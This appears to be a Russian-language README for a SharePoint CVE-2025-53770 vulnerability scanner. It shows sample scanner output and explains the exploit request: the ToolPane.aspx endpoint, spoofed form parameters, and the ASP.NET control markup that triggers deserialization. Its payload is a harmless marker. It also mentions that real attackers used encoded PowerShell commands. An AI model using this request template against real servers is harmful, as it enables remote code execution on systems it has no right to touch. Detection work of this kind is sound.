
Сканер для уязвимости нулевого дня SharePoint CVE-2025-53770 RCE (форк от hazcod/CVE-2025-53770)
Это сканер уязвимости удалённого выполнения кода в SharePoint без аутентификации, которой присвоен номер CVE-2025-53770. Код был написан путём обратной разработки полезной нагрузки, обнаруженной в реальных атаках.
Используйте на свой страх и риск, я не несу ответственности за любой негативный эффект, который это может вызвать.
Он пытается эксплуатировать уязвимость, внедряя маркер в виджет ToolBox SharePoint. Если в ответе сервера SharePoint обнаружен этот безвредный маркер, хост помечается как уязвимый.
# check if <TARGET-HOSTNAME> is vulnerable and try extract version information
% ./CVE-2025-53770 [<TARGET-HOSTNAME> ...]
INFO[0000] set log level fields.level=info
INFO[0000] starting scanner targets=1
INFO[0001] detected SharePoint version target=<REDACTED> version="MicrosoftSharePointTeamServices: 16.0.0.5469\n"
WARN[0001] target is vulnerable target=<REDACTED>
# turn on debug logging and try retrieving SharePoint version information
% ./CVE-2025-53770 -log=debug -version <TARGET-HOSTNAME>
...
Любой, кто использует локальную версию SharePoint Server без KB5002768 и KB5002754.
Предположительно, уязвимость основывается на ранее раскрытой уязвимости SharePoint, CVE-2025-49706.
Отправляя HTTP POST-запрос на https://<TARGET>/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx с полезной нагрузкой, сжатой GZIP и закодированной BASE64, можно добиться удалённого выполнения кода (RCE) в контексте процесса выполнения SharePoint.
Здесь важны два параметра формы:
MSOTlPn_Uri: путь к источнику элемента управленияОн имитирует ссылку на легитимный элемент управления SharePoint (AclEditor.ascx) и обманом заставляет SharePoint разрешить редактирование веб-части.
Похоже, это фиктивное значение, которое нужно только для прохождения валидации.
Исходная вредоносная нагрузка включает MSOTlPn_Uri=https://<TARGET>%s/_controltemplates/15/AclEditor.ascx, но, судя по всему, на данном этапе оно не используется.
MSOTlPn_DWP: конфигурация веб-части.Этот параметр внедряет пользовательские директивы ASP.NET (<%@ Register %>) и серверную разметку (<Scorecard:ExcelDataSet>).
Параметр CompressedDataTable содержит сериализованные данные, контролируемые атакующим (GZIP + base64), что запускает RCE.
Эта нагрузка имеет следующую структуру:
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="<PAYLOAD-GZIPPED-BASE64-ENCODED>" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>
Если существует такой элемент управления, как Scorecard:ExcelDataSet, и задано его свойство CompressedDataTable, он десериализуется напрямую парсером DWP SharePoint.
Сама нагрузка может быть довольно интересной, поскольку она может содержать System.DelegateSerializationHolder, который вызывает RCE через десериализацию.
Злоумышленники злоупотребляли этим, передавая /c powershell -EncodedCommand <POWERSHELL-PAYLOAD> в своей нагрузке для выполнения кода.
В нашем случае мы просто передаём статический заполнитель, чтобы доказать возможность эксплуатации;
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<foo>
<bar diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
<poc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<TestWrapper>
<Info>This is a harmless CVE-2025-53770 PoC marker.</Info>
<Timestamp>2025-07-21T14:04:52Z</Timestamp>
</TestWrapper>
</poc>
</bar>
</foo>
</diffgr:diffgram>